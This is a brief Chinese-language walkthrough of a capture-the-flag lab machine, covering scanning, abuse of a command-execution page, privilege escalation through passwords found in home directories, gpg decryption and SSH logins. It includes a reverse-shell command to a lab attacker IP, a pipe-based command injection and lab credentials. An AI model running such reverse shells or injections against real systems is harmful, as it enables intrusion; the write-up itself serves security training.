1.查看靶机的mac地址并修改网络模式为nat
2.主机发现
3.端口扫描
4.访问80端口
5.扫描目录
6.拼接路径没有什么发现,拼接robots.txt发现还有路径
7.拼接发现/dev_shell.php是一个命令执行的页面
8.执行命令
whoami | ls
9.发现dev_shell.php.bak备份文件,访问它
10.下载下来发现
11.反弹shell
whoami | pwd&echo "bash -i >& /dev/tcp/192.168.42.128/9696 0>&1" | bash
12.反弹成功查看权限
提权
1.查看目录下有什么
cd /home
ls
cd bob
ls -al
2.发现这个html文件,查看它
得到
jc:Qwerty
seb:T1tanium_Pa$$word_Hack3rs_Fear_M3
3.在 Documents 下发现一个加密的文件 login.txt.gpg 和一个目录 Secret
4.在 /home/bob/Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here 下,发现了 notes.sh
5.查看notes.sh
这个是藏头诗,密钥为 HARPOCRATES
6.返回DOcuments目录下,解密 login.txt.gpg ,没有权限
7.ssh登录其他用户尝试
ssh jc@192.168.42.185 -p 25468
Qwerty
8.再次解密
9.再看看 elliot 的家目录,发现一个 theadminisdumb.txt 文件
10.查看内容,这里提到他把密码改为了 theadminisdumb
elliot:theadminisdumb
11.ssh连接bob用户
ssh bob@192.168.42.185 -p 25468
b0bcat_